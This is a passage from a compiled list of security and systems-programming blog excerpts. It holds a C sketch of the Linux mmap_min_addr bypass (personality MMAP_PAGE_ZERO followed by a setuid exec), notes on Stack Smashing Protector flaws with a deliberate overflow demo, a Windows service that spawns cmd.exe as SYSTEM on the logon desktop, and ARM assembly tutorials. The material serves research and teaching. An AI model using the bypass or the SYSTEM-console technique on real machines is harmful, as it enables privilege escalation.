Source: cr0 blog: Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)
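(A minimal sketch of the sequence described above - the personality(2) flip followed by the setuid exec. This is an illustration under stated assumptions: the pulseaudio path and -L module specification are placeholders, since the exact syntax depends on the installed version:)

#include <sys/personality.h>
#include <unistd.h>

int main(void)
{
    /* Add MMAP_PAGE_ZERO to our persona: the kernel will map page zero
       on the next exec, and (the bug) the flag survives the setuid exec. */
    personality(personality(0xffffffff) | MMAP_PAGE_ZERO);

    /* Exec a setuid binary that drops privileges and then loads a
       caller-supplied library, e.g. pulseaudio's -L option.
       The path and module spec below are hypothetical. */
    execl("/usr/bin/pulseaudio", "pulseaudio", "-L", "our-module-spec", (char *)0);
    return 1;
}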
  5. Adventure with Stack Smashing Protector (SSP)

by pi3

Introduction. I was playing heavily with the Stack Smashing Protector a few years ago. Some of my research (observations) I decided to publish in phrack magazine, but not everything. Two years ago my professional life moved to the Windows environment and unfortunately I didn't have as much time to play with the UNIX world as before. One weekend I decided to reanalyze the SSP code again, and this write-up describes a few of the observations I made during that work...

... which can be shortly summarized as:

Not security related...

1. We can change the program's name (from SSP's perspective) by overwriting the memory region that the pointer to "argv[0]" points to.
2. We can crash the Stack Smashing Protector code in many ways:
   a. by corrupting the memory region pointed to by the "__environ" variable;
   b. by setting "LIBC_FATAL_STDERR_" to the edge of valid addresses;
   c. by forcing "alloca()" to fail - e.g. stack exhaustion.
   There is one more bug, which I analyze more comprehensively at point 4. It may indirectly force SSP to crash. It exists in the DWARF stack (state) machine, which is responsible for gathering information about the stack trace ("__backtrace()") and printing it.
3. We can slightly control SSP's execution flow. (Un)Fortunately it doesn't have any influence on the main execution (what about security?). The following scenarios are possible:
   a. force SSP to open "/dev/tty";
   b. force SSP not to open "/dev/tty" and assign to the "fd" descriptor the STDERR_FILENO value:
      #define STDERR_FILENO 2 /* Standard error output. */
   c. crash SSP via scenario 2b.
4. We can indirectly crash SSP via the unwinding algorithm (read-AV, or we can be killed by the "gcc_unreachable" or "gcc_assert" function) - the DWARF stack (state) machine.

Somewhat security related...

5. We can force SSP to allocate a lot of memory and cause a Denial of Service via a resource exhaustion attack.
6. Theoretical information leak:
   - stack cookie information leak;
   - any kind of information leak;
   - file corruption;
   - simulate that an FDE object was not found;
   - simulate that an FDE object was found.

The full write-up is available here.

Best regards,
Adam 'pi3' Zabrocki

Source: Adventure with Stack Smashing Protector (SSP) : pi3 blog
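(For readers who want to poke at SSP themselves: the canonical way to make __stack_chk_fail fire is a deliberate overflow like the sketch below, compiled with gcc -fstack-protector. This is a generic illustration, not code from pi3's write-up:)

#include <string.h>

/* Overflow a protected buffer so the stack cookie check fails on return;
   glibc then prints "*** stack smashing detected ***" and aborts. */
int main(int argc, char **argv)
{
    char buf[16];
    if (argc > 1)
        strcpy(buf, argv[1]); /* no bounds check, on purpose */
    return 0;
}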
  6. Running processes on the Winlogon desktop

Disclaimer: this is a Bad Idea unless you know exactly what you're doing, why you're doing it and there are no alternatives. Please use responsibly.

There may be circumstances where you'd like to programmatically interact with the Winlogon desktop (the one that houses the LogonUI process responsible for displaying logon tiles and the rest of, well, logon UI). Test automation, seamless VM integration, whatever. It's not easy though, and for good reasons:

- The logon desktop created by Winlogon has an ACL that only grants access to the SYSTEM account. We need a service to access it. Changing that ACL to allow other accounts is a very bad idea.
- When a user chooses "Switch user" from the Start Menu, or when the system first boots and displays the logon UI, it's all done in a separate session. If a new user logs on, the Winlogon session is reused for that user's interactive logon. If there is no new logon (but a user switch or unlocking a locked session, for example), the Winlogon session is destroyed (temporary processes appear in a Winlogon session after locking/unlocking a user session).

So, our service needs to monitor session changes and act when a Winlogon session is created (and made interactive). The code below demonstrates how you can create a process that runs on the Winlogon desktop and can interact with it.

#include <windows.h>
#include <wtsapi32.h>
#include "log.h"

#define SERVICE_NAME TEXT("QTestService")

SERVICE_STATUS g_Status;
SERVICE_STATUS_HANDLE g_StatusHandle;
HANDLE g_ConsoleEvent;
DWORD g_TargetSessionId;

void ServiceMain(int argc, TCHAR *argv[]);
DWORD ControlHandlerEx(DWORD controlCode, DWORD eventType, void *eventData, void *context);

WCHAR *g_SessionEventName[] = {
    L"<invalid>",
    L"WTS_CONSOLE_CONNECT",
    L"WTS_CONSOLE_DISCONNECT",
    L"WTS_REMOTE_CONNECT",
    L"WTS_REMOTE_DISCONNECT",
    L"WTS_SESSION_LOGON",
    L"WTS_SESSION_LOGOFF",
    L"WTS_SESSION_LOCK",
    L"WTS_SESSION_UNLOCK",
    L"WTS_SESSION_REMOTE_CONTROL",
    L"WTS_SESSION_CREATE",
    L"WTS_SESSION_TERMINATE"
};

// Entry point.
int main(int argc, TCHAR *argv[])
{
    SERVICE_TABLE_ENTRY serviceTable[] = {
        {SERVICE_NAME, ServiceMain},
        {NULL, NULL}
    };

    log_init(NULL, TEXT("qservice"));
    logf("main: start");
    StartServiceCtrlDispatcher(serviceTable);
    logf("main: end");
}

DWORD WINAPI WorkerThread(void *param)
{
    TCHAR *cmdline;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    HANDLE newToken;
    DWORD sessionId;
    DWORD size;
    HANDLE currentToken;
    HANDLE currentProcess = GetCurrentProcess();

    cmdline = (TCHAR*) param;

    // Wait until the interactive session changes (to the winlogon console).
    WaitForSingleObject(g_ConsoleEvent, INFINITE);

    // Get the access token from ourselves.
    OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken);
    // The session ID is stored in the access token. For services it's normally 0.
    GetTokenInformation(currentToken, TokenSessionId, &sessionId, sizeof(sessionId), &size);
    logf("current session: %d", sessionId);

    // We need to create a primary token for CreateProcessAsUser.
    if (!DuplicateTokenEx(currentToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &newToken))
    {
        perror("DuplicateToken");
        return GetLastError();
    }
    CloseHandle(currentProcess);

    // g_TargetSessionId is set by the SessionChange() handler after a WTS_CONSOLE_CONNECT event.
    // Its value is the new console session ID. In our case it's the "logon screen".
    sessionId = g_TargetSessionId;
    logf("Running process '%s' in session %d", cmdline, sessionId);

    // Change the session ID in the new access token to the target session ID.
    // This requires SeTcbPrivilege, but we're running as SYSTEM and have it.
    if (!SetTokenInformation(newToken, TokenSessionId, &sessionId, sizeof(sessionId)))
    {
        perror("SetTokenInformation(TokenSessionId)");
        return GetLastError();
    }

    // Create the process with the new token.
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    // Don't forget to set the correct desktop.
    si.lpDesktop = TEXT("WinSta0\\Winlogon");
    if (!CreateProcessAsUser(newToken, 0, cmdline, 0, 0, 0, 0, 0, 0, &si, &pi))
    {
        perror("CreateProcessAsUser");
        return GetLastError();
    }

    return ERROR_SUCCESS;
}

void ServiceMain(int argc, TCHAR *argv[])
{
    TCHAR *cmdline = TEXT("cmd.exe");
    HANDLE workerHandle;

    logf("ServiceMain: start");

    g_Status.dwServiceType = SERVICE_WIN32;
    g_Status.dwCurrentState = SERVICE_START_PENDING;
    // SERVICE_ACCEPT_SESSIONCHANGE allows us to receive session change notifications.
    g_Status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_SESSIONCHANGE;
    g_Status.dwWin32ExitCode = 0;
    g_Status.dwServiceSpecificExitCode = 0;
    g_Status.dwCheckPoint = 0;
    g_Status.dwWaitHint = 0;

    g_StatusHandle = RegisterServiceCtrlHandlerEx(SERVICE_NAME, ControlHandlerEx, NULL);
    if (g_StatusHandle == 0)
    {
        perror("RegisterServiceCtrlHandlerEx");
        goto stop;
    }

    g_Status.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(g_StatusHandle, &g_Status);

    // Create the trigger event for the worker thread.
    g_ConsoleEvent = CreateEvent(NULL, FALSE, FALSE, NULL);

    // Start the worker thread.
    logf("Starting worker thread");
    workerHandle = CreateThread(NULL, 0, WorkerThread, cmdline, 0, NULL);
    if (!workerHandle)
    {
        perror("CreateThread");
        goto stop;
    }

    // Wait for the worker thread to exit.
    WaitForSingleObject(workerHandle, INFINITE);

stop:
    logf("exiting");
    g_Status.dwCurrentState = SERVICE_STOPPED;
    g_Status.dwWin32ExitCode = GetLastError();
    SetServiceStatus(g_StatusHandle, &g_Status);
    logf("ServiceMain: end");
    return;
}

void SessionChange(DWORD eventType, WTSSESSION_NOTIFICATION *sn)
{
    if (eventType < RTL_NUMBER_OF(g_SessionEventName))
        logf("SessionChange: %s, session ID %d", g_SessionEventName[eventType], sn->dwSessionId);
    else
        logf("SessionChange: <unknown event: %d>, session id %d", eventType, sn->dwSessionId);

    if (eventType == WTS_CONSOLE_CONNECT)
    {
        // Store the new session ID for the worker thread and signal the trigger event.
        g_TargetSessionId = sn->dwSessionId;
        SetEvent(g_ConsoleEvent);
    }
}

DWORD ControlHandlerEx(DWORD control, DWORD eventType, void *eventData, void *context)
{
    switch (control)
    {
    case SERVICE_CONTROL_STOP:
    case SERVICE_CONTROL_SHUTDOWN:
        g_Status.dwWin32ExitCode = 0;
        g_Status.dwCurrentState = SERVICE_STOPPED;
        logf("stopping...");
        SetServiceStatus(g_StatusHandle, &g_Status);
        break;

    case SERVICE_CONTROL_SESSIONCHANGE:
        SessionChange(eventType, (WTSSESSION_NOTIFICATION*) eventData);
        break;

    default:
        logf("ControlHandlerEx: code 0x%x, event 0x%x", control, eventType);
        break;
    }
    return ERROR_SUCCESS;
}

You can install the service using the following command (mind the spaces):

C:\>sc create QTestService binPath= d:\test\QService.exe type= own start= demand
[SC] CreateService SUCCESS

Then start it with:

sc start QTestService

After starting, choose "Switch user" or "Lock" from the Start Menu. You should see a console window on the logon screen.

~ by omeg on January 29, 2014.

Source: » Running processes on the Winlogon desktop - Spinning mirrors
  7. Understanding ARM Assembly Part 1

ntdebug 22 Nov 2013 3:38 PM

My name is Marion Cole, and I am a Sr. EE in the Microsoft Platforms Serviceability group. You may be wondering why Microsoft support would need to know ARM assembly. Doesn't Windows only run on x86 and x64 machines? No. Windows has run on a variety of processors in the past. Those include the i860, Alpha, MIPS, Fairchild Clipper, PowerPC, Itanium, SPARC, 286, 386, IA-32, x86, x64, and the newest one is ARM. Most of these processors are antiquated now. The common ones now are IA-32, x86, and x64. However, Windows has started supporting ARM processors in order to jump into the portable devices arena. You will find them in the Microsoft Surface RT, Windows Phones, and other things in the future I am sure. So you may be saying that these devices are locked and cannot be debugged. That is true from a live debug perspective, but you can get memory dumps and application dumps from them, and those can be debugged.

Processor

There are limitations on the ARM processors that Windows supports. There are 3 System on Chip (SOC) vendors that are supported: nVidia, Texas Instruments, and Qualcomm. Windows only supports the ARMv7 (Cortex, Scorpion) architecture in ARMv7-A (Application Profile) mode. This implements a traditional ARM architecture with multiple modes, supporting a Virtual Memory System Architecture (VMSA) based on an MMU. It supports the ARM and Thumb-2 instruction sets, which allows for a mixture of 16-bit (Thumb) and 32-bit (ARM) opcodes. So it will look strange in the assembly. Luckily the debuggers know this and handle it for you. This also helps to shrink the size of the assembly code in memory. The processor also has to have the optional ISA extensions VFP (hardware floating point) and NEON (128-bit SIMD architecture).

In order to understand the assembly that you will see, you need to understand the processor internals. ARM is a Reduced Instruction Set Computer (RISC), much like some of the previous processors that Windows ran on. It is a 32-bit load/store style processor. It has a "weakly-ordered" memory model, similar to Alpha and IA64, and it requires specific memory barriers to enforce ordering. On ARM devices these are the ISB, DSB, and DMB instructions.

Registers

The processor has 16 available registers, r0 - r15.

0: kd> r
r0=00000001  r1=00000000  r2=00000000  r3=00000000  r4=e1820044  r5=e17d0580
r6=00000001  r7=e17f89b9  r8=00000002  r9=00000000 r10=1afc38ec r11=e1263b78
r12=e127813c  sp=e1263b20  lr=e16c12c3  pc=e178b6d0 psr=00000173 ----- Thumb

r0, r1, r2, r3, and r12 are volatile registers. Volatile registers are scratch registers presumed by the caller to be destroyed across a call. Nonvolatile registers are required to retain their values across a function call and must be saved by the callee if used. On Windows, five of these registers have a designated purpose:

- PC (r15) - Program Counter (EIP on x86)
- LR (r14) - Link Register. Used as a return address to the caller.
- SP (r13) - Stack Pointer (ESP on x86).
- R11 - Frame Pointer (EBP on x86).
- CPSR - Current Program Status Register (Flags on x86).

In Windbg all but r11 will be labeled appropriately for you. So you may be asking why r11 is not labeled "fp" in the debugger. That is because r11 is only used as a frame pointer when you are calling a non-leaf subroutine.
The way it works is this: when a call to a non-leaf subroutine is made, the called subroutine pushes the value of the previous frame pointer (in r11) to the stack (right after the lr), and then r11 is set to point to this location in the stack. So we eventually end up with a linked list of frame pointers in the stack, which easily enables the construction of the call stack. The frame pointer is not pushed to the stack in leaf functions. We will discuss leaf functions later.

CPSR (Current Program Status Register)

Now we need to understand some things about the CPSR register. Here is the bit breakdown:

bits 31-28: N Z C V (condition code flags)
bit  27:    Q
bits 26-25: IT
bit  24:    J
bits 23-20: Reserved
bits 19-16: GE
bits 15-10: IT
bit  9:     E
bit  8:     A
bit  7:     I
bit  6:     F
bit  5:     T
bits 4-0:   M

Bits [31:28] - Condition Code Flags:

- N - bit 31 - If this bit is set, the result was negative. If the bit is cleared, the result was positive or zero.
- Z - bit 30 - If set, this bit indicates that the result was zero or the compared values were equal. If it is cleared, the value is non-zero or the compared values are not equal.
- C - bit 29 - If this bit is set, the instruction resulted in a carry condition, e.g. adding two unsigned values resulted in a value too large to be stored.
- V - bit 28 - If this bit is set, the instruction resulted in an overflow condition, e.g. an overflow from adding two signed values.

Instruction variants ending with 's' set the condition codes (mov/movs).

- E - bit 9 - Endianness (big = 1 / little = 0)
- T - bit 5 - Set if executing Thumb instructions
- M - bits [4:0] - CPU mode (User 10000 / Supervisor 10011)

So why do I need to know about the CPSR (Current Program Status Register)? You will need to know where some of these bits are because of how some assembly instructions affect these flags. For example:

- ADD will add two registers together, or add an immediate value to a register. However, it will not affect the flags.
- ADDS will do the same as ADD, but it does affect the flags.
- MOV will allow you to move a value into a register, or a value between registers. This is not like x86/x64: MOV will not let you read or write memory. It does not affect the flags.
- MOVS does the same thing as MOV, but it does affect the flags.

I hope you are seeing a trend here. There are instructions that look the same, but if they end in "S" then you need to know that they will affect the flags. I am not going to list all of those assembly instructions here. They are already listed in the ARM Architecture Reference Manual ARMv7-A and ARMv7-R edition.

So now we have an idea of what can set the flags. Now we need to understand what the flags are used for. They are mainly used for branching instructions. Here is an example:

003a11d2 429a  cmp r2,r3
003a11d4 d104  bne |MyApp!FirstFunc+0x28 (003a11e0)|

The first instruction in this code (cmp) compares the value stored in register r2 to the value stored in register r3.
This comparison instruction sets or resets the Z flag in the CPSR register. The second instruction is a branch instruction with the condition code ne, which means that if the result of the previous comparison was that the values are not equal (the CPSR flag Z is zero), then branch to the address MyApp!FirstFunc+0x28 (003a11e0). Otherwise, execution continues.

There are a few compare instructions. "cmp" subtracts two register values, sets the flags, and discards the result. "cmn" adds two register values, sets the flags, and discards the result. "tst" does a bit-wise AND of two register values, sets the flags, and discards the result. There is even an If-Then (it) instruction. I am not going to discuss that one here, as I have never seen it in any of the Windows code.

So is "bne" the only branch instruction? No. There are a lot of them. Here is a table of the mnemonic extensions that can be seen after "b", and what they check in the CPSR register:

Mnemonic Extension | Meaning (Integer)             | Condition Flags (in CPSR)
EQ        | Equal                        | Z==1
NE        | Not Equal                    | Z==0
MI        | Negative (Minus)             | N==1
PL        | Positive or Zero (Plus)      | N==0
HI        | Unsigned higher              | C==1 and Z==0
LS        | Unsigned lower or same       | C==0 or Z==1
GE        | Signed greater than or equal | N==V
LT        | Signed less than             | N!=V
GT        | Signed greater than          | Z==0 and N==V
LE        | Signed less than or equal    | Z==1 or N!=V
VS        | Overflow                     | V==1
VC        | No overflow                  | V==0
CS        | Carry set                    | C==1
CC        | Carry clear                  | C==0
None (AL) | Execute always               |

Floating Point Registers

As mentioned earlier, the processor also has to have the ISA extensions VFP (hardware floating point) and NEON (128-bit SIMD architecture). Here is what they are.

Floating Point

There are 16 64-bit registers (d0-d15) overlaid with 32 32-bit registers (s0-s31). There are varieties of the ARM processor that have 32 64-bit registers and 64 32-bit registers. Windows 8 will support both the 16- and 32-register variants. You have to be careful when using these, because if you access unaligned floats you may cause an exception.

SIMD (NEON)

The SIMD (NEON) extension adds 16 128-bit registers (q0-q15) on top of the floating point registers. So referencing Q0 is the same as referencing D0-D1 or S0-S1-S2-S3.

In part 2 we will discuss how Windows utilizes this processor.

Source: Understanding ARM Assembly Part 1 - Ntdebugging Blog - Site Home - MSDN Blogs
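(To anchor the cmp/bne example above: that pair is exactly what a compiler emits for an ordinary inequality test. A rough C equivalent, with hypothetical names - register assignment is of course up to the compiler:)

/* Rough source-level equivalent of the cmp/bne pattern above:
   cmp r2,r3 sets the flags, bne branches while Z==0. */
int FirstFunc(int a, int b)
{
    if (a != b)    /* cmp + bne: branch taken when the values differ (Z==0) */
        return 1;  /* branch target */
    return 0;      /* fall-through when a == b (Z==1) */
}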
  8. Introduction to ARMv8 64-bit Architecture

April 9, 2014 By PnUic Leave a Comment

Introduction

The ARM architecture is a Reduced Instruction Set Computer (RISC) architecture; indeed, it originally stood for "Acorn RISC Machine" but now stands for "Advanced RISC Machines". In recent years ARM processors, with the diffusion of smartphones and tablets, have become very popular: mostly this is due to reduced costs and greater power efficiency compared to other architectures such as CISC. Complex Instruction Set Computer (CISC) processors, like the x86, have a rich instruction set capable of doing complex things with a single instruction. Such processors often have significant amounts of internal logic that decodes machine instructions into sequences of internal operations (microcode). RISC architectures, in contrast, have a smaller number of more general-purpose instructions that can be executed with significantly fewer transistors, making the silicon cheaper and more power efficient. Like other RISC architectures, ARM cores have a large number of general-purpose registers, and many instructions execute in a single cycle. It has simple addressing modes, where all load/store addresses can be determined from register contents and instruction fields.

A peculiarity of RISC architectures (ARM, MIPS, ...): the load/store architecture only allows memory to be accessed by load and store operations, and all values for an operation need to be loaded from memory and be present in registers, so operations such as "add reg,[address]" are not permitted! Another difference from CISC architectures: when a Branch and Link is executed (the "call" operation in Intel architectures), the return address is stored in a special register and not on the stack. A gap in the ARM architecture is the absence of multi-threading support, which is present in many other architectures such as Intel and MIPS.

Because AArch32 (32-bit) is already well documented (ARM on wiki, Cambridge University - Operation System Development), I decided to talk only about AArch64 (64-bit).

Processors:

A short ARM processor list:

- Classic or Cortex-A: with DSP, Floating Point, TrustZone and Jazelle extensions. ARMv5 and ARMv6 (2001)
- Cortex-M: ARM Thumb-2 technology, which provides excellent code density. With Thumb-2 technology, the Cortex-M processors support a fundamental base of 16-bit Thumb instructions, extended to include more powerful 32-bit instructions. First multi-core. (2004)
- Cortex-R: ARMv7. Deeply pipelined micro-architecture, flexible Multi-Processor Core (MPCore) configurations: Symmetric Multi-Processing (SMP) & Asymmetric Multi-Processing (AMP), LPAE extension.
- Cortex-A50: ARMv8-A 64-bit with load-acquire and store-release features, which are an excellent match for the C++11, C11 and Java memory models. (2011)

Extensions

With every new version of ARM there are new extensions provided; the v8 architecture has these:

- Jazelle is a Java hardware/software accelerator: "ARM Jazelle DBX (Direct Bytecode eXecution) technology for direct bytecode execution of Java". On the software side, Jazelle MobileVM is a complete JVM which is multi-tasking, engineered to provide high-performance multi-tasking in a very small memory footprint.
- Floating Point: for floating point operations.
- NEON: the ARM SIMD 128-bit (Single Instruction, Multiple Data) engine, and DSP, the SIMD 32-bit engine, useful for linear algebra operations.
- Cryptographic Extension: an extension of the SIMD support that operates on the vector register file.
It provides instructions for the acceleration of encryption and decryption, supporting the following: AES, SHA1, SHA2-256.
TrustZone: a system-wide approach to security for a wide array of client and server computing platforms, including payment protection technology, digital rights management, BYOD, and a host of secured enterprise solutions.
Virtualization Extensions, together with the Large Physical Address Extension (LPAE), enable the efficient implementation of virtual machine hypervisors for ARM architecture compliant processors. The virtualization extensions provide the basis for ARM architecture compliant processors to address the needs of both client and server devices for the partitioning and management of complex software environments into virtual machines. The Large Physical Address Extension provides the means for each of the software environments to efficiently utilize the available physical memory when handling large amounts of data.
[h=2]Architectures[/h]
AArch64 is the ARMv8-A 64-bit execution state. It uses 31 64-bit general-purpose registers (R0-R30) and a 64-bit program counter (PC), stack pointer (SP), and exception link registers (ELR). It provides 32 128-bit registers for SIMD vector and scalar floating-point support (V0-V31). A64 instructions have a fixed length of 32 bits and are always little-endian.
AArch32 is the ARMv8-A 32-bit execution state. It uses 13 32-bit general-purpose registers (R0-R12), a 32-bit program counter (PC), stack pointer (SP), and link register (LR). It provides 32 64-bit registers for Advanced SIMD vector and scalar floating-point support. The AArch32 execution state provides a choice of two instruction sets, A32 (ARM) and T32 (Thumb2). Operation in AArch32 state is compatible with ARMv7-A operation.
T32: 16-bit instructions are decompressed transparently to full 32-bit ARM instructions in real time without performance loss. Thumb-2 technology made Thumb a mixed-length (32- and 16-bit) instruction set.
[h=2]Data types[/h]
The data types are simply these:
Byte: 8 bits.
Halfword: 16 bits.
Word: 32 bits.
Doubleword: 64 bits.
Quadword: 128 bits.
The architecture also supports the following floating-point data types:
Half-precision floating-point format.
Single-precision floating-point format.
Double-precision floating-point format.
To keep this short guide from getting too long, I don't cover floating-point assembly instructions; if you want to know more about them, see the ARM Architecture Reference Manual.
[h=2]Exception levels[/h]
There are four exception levels, which replace the 8 different processor modes. They work like the rings in Intel architectures, forming a privilege hierarchy:
EL0 is the least privileged level; indeed, it is called unprivileged execution. Apps run here.
EL1: the OS kernel runs here.
EL2: provides support for virtualization of Non-secure operation. A hypervisor can run here.
EL3: provides support for switching between two security states, Secure state and Non-secure state. A secure monitor can run here.
When executing in AArch64 state, execution can move between Exception levels only on taking an exception or on returning from an exception. Each of the 4 privilege levels has 3 private banked registers: the Exception Link Register, Stack Pointer and Saved PSR.
[h=3]Interprocessing: AArch64 <=> AArch32[/h]
Interprocessing is the term used to describe moving between the AArch64 and AArch32 execution states. The Execution state can change only on a change of Exception level.
This means that the Execution state can change only on taking an exception to a higher Exception level, or returning from an exception to a lower Exception level.
On taking an exception to a higher Exception level, the Execution state either:
Remains unchanged.
Changes from AArch32 state to AArch64 state.
On returning from an exception to a lower Exception level, the Execution state either:
Remains unchanged.
Changes from AArch64 state to AArch32 state.
[h=2]The A64 Registers[/h]
A64 has 31 general-purpose (integer) registers, plus the zero register and the current stack pointer register. Here are all the registers:
[TABLE]
[TR] [TD]Wn[/TD] [TD]32 bits[/TD] [TD]General-purpose register: n can be 0-30[/TD] [/TR]
[TR] [TD]Xn[/TD] [TD]64 bits[/TD] [TD]General-purpose register: n can be 0-30[/TD] [/TR]
[TR] [TD]WZR[/TD] [TD]32 bits[/TD] [TD]Zero register[/TD] [/TR]
[TR] [TD]XZR[/TD] [TD]64 bits[/TD] [TD]Zero register[/TD] [/TR]
[TR] [TD]WSP[/TD] [TD]32 bits[/TD] [TD]Current stack pointer[/TD] [/TR]
[TR] [TD]SP[/TD] [TD]64 bits[/TD] [TD]Current stack pointer[/TD] [/TR]
[/TABLE]
How the registers should be used by compilers and programmers:
r30 (LR): The Link Register, used as the subroutine link register; it stores the return address when Branch with Link operations are performed.
r29 (FP): The Frame Pointer.
r19…r28: Callee-saved registers.
r18: The Platform Register, if needed; otherwise a temporary register.
r17 (IP1): The second intra-procedure-call temporary register (can be used by call veneers and PLT code); at other times may be used as a temporary register.
r16 (IP0): The first intra-procedure-call scratch register (can be used by call veneers and PLT code); at other times may be used as a temporary register.
r9…r15: Temporary registers.
r8: Indirect result location register.
r0…r7: Parameter/result registers.
The PC (program counter) has limited access: only a few instructions, such as the branch instructions, can modify it.
[h=2]The use of the Stack[/h]
The stack implementation is full-descending: on a push the stack pointer is decremented, i.e. the stack grows towards lower addresses. Another feature is that the stack must be quadword aligned: SP mod 16 = 0. A64 instructions can use the stack pointer only in a limited number of cases:
Load/Store instructions use the current stack pointer as the base address: when stack alignment checking is enabled by system software and the base register is SP, the current stack pointer must be initially quadword aligned, that is, aligned to 16 bytes. Misalignment generates a Stack Alignment fault.
Add and subtract data processing instructions in their immediate and extended register forms use the current stack pointer as a source register, or the destination register, or both.
Logical data processing instructions in their immediate form use the current stack pointer as the destination register.
A typical function prologue and epilogue that obeys these rules is sketched below.
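This is a minimal hand-written sketch of mine (not from the article); it keeps SP 16-byte aligned and uses the pre- and post-indexed addressing modes described later:

myfunc:
    stp x29, x30, [sp, -16]!   // pre-indexed push: SP -= 16 first, keeping quadword alignment
    mov x29, sp                // establish the frame pointer
    mov w0, 0                  // function body would go here; w0 holds the result
    ldp x29, x30, [sp], 16     // post-indexed pop: restore FP and LR, then SP += 16
    ret                        // return to the address in x30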
[h=2]Process State[/h]
PSTATE (the process state, CPSR on AArch32) holds process-state related information. Its flags are changed by compare instructions, for example, and the processor uses them to decide whether to take a branch (a jump in Intel terminology) or not.
[TABLE]
[TR] [TD]N[/TD] [TD]Negative condition flag[/TD] [/TR]
[TR] [TD]Z[/TD] [TD]Zero condition flag[/TD] [/TR]
[TR] [TD]C[/TD] [TD]Carry condition flag[/TD] [/TR]
[TR] [TD]V[/TD] [TD]oVerflow condition flag[/TD] [/TR]
[TR] [TD]D[/TD] [TD]Debug mask bit [AArch64 only][/TD] [/TR]
[TR] [TD]A[/TD] [TD]Asynchronous abort mask bit[/TD] [/TR]
[TR] [TD]I[/TD] [TD]IRQ mask bit[/TD] [/TR]
[TR] [TD]F[/TD] [TD]FIQ mask bit[/TD] [/TR]
[TR] [TD]SS[/TD] [TD]Software step bit[/TD] [/TR]
[TR] [TD]IL[/TD] [TD]Illegal execution state bit[/TD] [/TR]
[TR] [TD]EL[/TD] [TD]Exception Level (see above)[/TD] [/TR]
[TR] [TD]nRW[/TD] [TD]not Register Width: 0=64, 1=32[/TD] [/TR]
[TR] [TD]SP[/TD] [TD]Stack pointer select: 0=SP0, 1=SPx [AArch64 only][/TD] [/TR]
[TR] [TD]Q[/TD] [TD]Cumulative saturation flag [AArch32 only][/TD] [/TR]
[TR] [TD]GE[/TD] [TD]Greater than or Equal flags [AArch32 only][/TD] [/TR]
[TR] [TD]IT[/TD] [TD]If-then execution state bits [AArch32 only][/TD] [/TR]
[TR] [TD]J[/TD] [TD]J execution state bit [AArch32 only][/TD] [/TR]
[TR] [TD]T[/TD] [TD]T32 execution state bit [AArch32 only][/TD] [/TR]
[TR] [TD]E[/TD] [TD]Endian execution state bit [AArch32 only][/TD] [/TR]
[TR] [TD]M[/TD] [TD]Mode field (see above) [AArch32 only][/TD] [/TR]
[/TABLE]
The first four flags are the condition flags (NZCV), and they are the ones mostly used by the processor:
N: Negative condition flag. If the result is regarded as a two's complement signed integer, the PE sets N to 1 if the result is negative, and sets N to 0 if it is positive or zero.
Z: Zero condition flag. Set to 1 if the result of the instruction is zero, and to 0 otherwise. A result of zero often indicates an equal result from a comparison.
C: Carry condition flag. Set to 1 if the instruction results in a carry condition, for example an unsigned overflow that is the result of an addition.
V: Overflow condition flag. Set to 1 if the instruction results in an overflow condition, for example a signed overflow that is the result of an addition.
[h=2]Condition code suffixes[/h]
These suffixes are used by the conditional branch instruction; here is a table that explains what they mean:
[TABLE]
[TR] [TH]Suffix[/TH] [TH]Flags[/TH] [TH]Meaning[/TH] [/TR]
[TR] [TD]EQ[/TD] [TD]Z set[/TD] [TD]Equal[/TD] [/TR]
[TR] [TD]NE[/TD] [TD]Z clear[/TD] [TD]Not equal[/TD] [/TR]
[TR] [TD]CS or HS[/TD] [TD]C set[/TD] [TD]Higher or same (unsigned >=)[/TD] [/TR]
[TR] [TD]CC or LO[/TD] [TD]C clear[/TD] [TD]Lower (unsigned <)[/TD] [/TR]
[TR] [TD]MI[/TD] [TD]N set[/TD] [TD]Negative[/TD] [/TR]
[TR] [TD]PL[/TD] [TD]N clear[/TD] [TD]Positive or zero[/TD] [/TR]
[TR] [TD]VS[/TD] [TD]V set[/TD] [TD]Overflow[/TD] [/TR]
[TR] [TD]VC[/TD] [TD]V clear[/TD] [TD]No overflow[/TD] [/TR]
[TR] [TD]HI[/TD] [TD]C set and Z clear[/TD] [TD]Higher (unsigned >)[/TD] [/TR]
[TR] [TD]LS[/TD] [TD]C clear or Z set[/TD] [TD]Lower or same (unsigned <=)[/TD] [/TR]
[TR] [TD]GE[/TD] [TD]N and V the same[/TD] [TD]Signed >=[/TD] [/TR]
[TR] [TD]LT[/TD] [TD]N and V differ[/TD] [TD]Signed <[/TD] [/TR]
[TR] [TD]GT[/TD] [TD]Z clear, N and V the same[/TD] [TD]Signed >[/TD] [/TR]
[TR] [TD]LE[/TD] [TD]Z set, N and V differ[/TD] [TD]Signed <=[/TD] [/TR]
[TR] [TD]AL[/TD] [TD]Any[/TD] [TD]Always. This suffix is normally omitted.[/TD] [/TR]
[/TABLE]
When you see <cond> next to an assembly instruction, you can use one of these suffixes. A short example follows.
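Here is a minimal hand-written sketch (mine, not the article's) of a signed three-way comparison using these suffixes:

    cmp x0, x1       // subtract x1 from x0, set NZCV, discard the result
    b.lt is_less     // signed less than: taken when N and V differ
    b.eq is_equal    // equal: taken when Z is set
    mov w2, 1        // fall through: signed x0 > x1
    b done
is_less:
    mov w2, -1
    b done
is_equal:
    mov w2, 0
done:
    ret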
